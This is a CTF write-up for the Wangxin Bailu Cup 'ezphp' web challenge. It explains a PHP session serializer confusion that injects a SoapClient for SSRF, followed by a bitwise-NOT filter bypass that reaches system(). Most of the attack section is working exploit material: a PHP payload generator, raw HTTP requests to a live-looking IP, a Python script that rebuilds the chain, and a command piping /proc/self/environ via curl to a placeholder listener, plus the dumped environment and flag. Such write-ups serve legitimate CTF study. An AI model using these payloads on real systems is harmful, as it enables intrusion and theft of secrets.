网信柏鹭杯 (Wangxin Bailu Cup) web challenges, by Sakura

sakura writeup

签到 (sign-in)

A single redirect; one curl and done.

web

ezphp

Use the callback function to switch the session serialization engine to php_serialize, then build a serialized SoapClient (the SSRF gadget) and write it into the session file through serialization injection. Next, use the variable-overwrite vulnerability to overwrite variable b with call_user_func; combined with the callback mechanism mentioned at the start, this calls an undefined method on the SoapClient object, which triggers __call and performs the SSRF request to flag.php.

Bypass the regex filter with bitwise NOT (~) to get RCE.

<?php
// Command to run on the target; "ip" is a placeholder for the attacker's listener.
$str = 'cat /proc/self/environ | curl -H "Content-Type: application/json" -X POST --data-binary @- ip';
// Bitwise NOT of every byte, then urlencode: no plaintext keyword reaches the regex filter.
$shell = urlencode(~$str);
// (~%8C%86%8C%8B%9A%92) is ~"system", so PHP evaluates ("system")(~$shell).
$url = "http://127.0.0.1/flag.php?i=(~%8C%86%8C%8B%9A%92)(~$shell);";
echo $url."\r\n\r\n";
$slen = strlen($url);
// The leading "|" is the key/value delimiter of the default php session handler
// (serialization injection); uri and location both point at the RCE URL.
$a = '|O:10:"SoapClient":3:{s:3:"uri";s:'.$slen.':"'.$url.'";s:8:"location";s:'.$slen.':"'.$url.'";s:13:"_soap_version";i:1;}';
echo urlencode($a);
POST /index.php?f=session_start&name=<payload generated above> HTTP/1.1
Host: 8.130.177.132:15294
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=bbb
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 31

serialize_handler=php_serialize
POST /index.php?f=extract&name=SoapClient HTTP/1.1
Host: 8.130.177.132:15294
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=bbb
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 16

b=call_user_func
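The two-request chain above depends on one detail: the session file is written with serialize_handler=php_serialize but read back by the default php handler, which treats everything before the first "|" as the key and unserializes what follows. The script below is an added example (not part of the original writeup) that reproduces the writeup's payload generator in Python and shows what each handler makes of the same session bytes. Function names (php_not, urlencode_not, rce_url, soapclient_payload, session_file_php_serialize, php_handler_split, build_chain) are my own, "ip" is the same placeholder for the attacker's listener as in the PHP generator, and only the key/value split of the php handler is modeled, not the full unserialize.

```python
from urllib.parse import quote

# Constructed command, same as the writeup's; "ip" is a placeholder listener host.
CMD = 'cat /proc/self/environ | curl -H "Content-Type: application/json" -X POST --data-binary @- ip'


def php_not(s: str) -> bytes:
    """Byte-wise NOT, which is what PHP's ~ operator does to a string."""
    return bytes((~b) & 0xFF for b in s.encode())


def urlencode_not(s: str) -> str:
    """urlencode(~$str): every inverted ASCII byte is >= 0x80, so all become %XX."""
    return quote(php_not(s), safe="")


def rce_url(cmd: str, host: str = "127.0.0.1") -> str:
    """Build the flag.php URL; (~"system")(~cmd) is evaluated as system(cmd)."""
    return f"http://{host}/flag.php?i=(~{urlencode_not('system')})(~{urlencode_not(cmd)});"


def php_str(s: str) -> str:
    """PHP serialize() encoding of a string: s:<bytelen>:"<value>"."""
    return f's:{len(s.encode())}:"{s}"'


def soapclient_payload(url: str) -> str:
    """Serialized SoapClient with uri/location set to the RCE URL, prefixed by the
    '|' that the php session handler treats as its key/value delimiter."""
    return (
        '|O:10:"SoapClient":3:{'
        + php_str("uri") + ";" + php_str(url) + ";"
        + php_str("location") + ";" + php_str(url) + ";"
        + 's:13:"_soap_version";i:1;}'
    )


def session_file_php_serialize(data: dict) -> str:
    """Session bytes as written under serialize_handler=php_serialize
    (a plain serialize() of the $_SESSION array; string values only)."""
    body = "".join(php_str(k) + ";" + php_str(v) + ";" for k, v in data.items())
    return f"a:{len(data)}:{{{body}}}"


def php_handler_split(content: str) -> tuple[str, str]:
    """How the default 'php' handler reads the same bytes: everything up to the
    first '|' is the key, the remainder is handed to unserialize()."""
    key, _, value = content.partition("|")
    return key, value


def build_chain(cmd: str = CMD) -> dict:
    """Run the whole construction and return every intermediate artifact."""
    url = rce_url(cmd)
    name = soapclient_payload(url)
    stored = session_file_php_serialize({"name": name})
    key, obj = php_handler_split(stored)
    return {
        "url": url,
        "name_param": quote(name, safe=""),  # value for ?name= in request 1
        "stored": stored,                     # bytes on disk after request 1
        "key": key,                           # what the php handler calls the key
        "object": obj,                        # what it unserializes: the SoapClient
    }


if __name__ == "__main__":
    chain = build_chain()
    print(chain["url"])
    print(chain["name_param"])
    print(chain["object"][:40], "...")
```

Because the whole php_serialize prefix (a:1:{s:4:"name";s:N:") lands in the key, the value the php handler unserializes starts exactly at O:10:"SoapClient", which is why the injected object comes back as $_SESSION data when the second request triggers the callback.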

Read the environment variables with cat /proc/self/environ (NUL separators are lost in the output, so the entries run together):

PHP_EXTRA_CONFIGURE_ARGS=--enable-fpm --with-fpm-user=www-data --with-fpm-group=www-data --disable-cgi
USER=www-data
HOSTNAME=838bfba2cdd2
PHP_INI_DIR=/usr/local/etc/php
SHLVL=2
HOME=/home/www-data
PHP_LDFLAGS=-Wl,-O1 -Wl,--hash-style=both -pie
PHP_CFLAGS=-fstack-protector-strong -fpic -fpie -O2
PHP_MD5=
PHP_VERSION=7.0.33
GPG_KEYS=1A4E8B7277C42E53DBA9C7B9BCAA30EA9C0D5763 6E4F6AB321FDC07F2C332E3AC2BF0BC433CFC8B3
PHP_CPPFLAGS=-fstack-protector-strong -fpic -fpie -O2
PHP_ASC_URL=https://secure.php.net/get/php-7.0.33.tar.xz.asc/from/this/mirror
PHP_URL=https://secure.php.net/get/php-7.0.33.tar.xz/from/this/mirror
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
PHPIZE_DEPS=autoconf dpkg-dev dpkg file g++ gcc libc-dev make pkgconf re2c
PWD=/var/www/html
PHP_SHA256=ab8c5be6e32b1f8d032909dedaaaa4bbb1a209e519abb01a52ce3914f9a13d96
FLAG=flag{ISEC-0e165f5593f2246bc53b395b7810c220}

https://qiuye.ink/pages/edcfd0/
Author
Akiba
Published
2021-10-29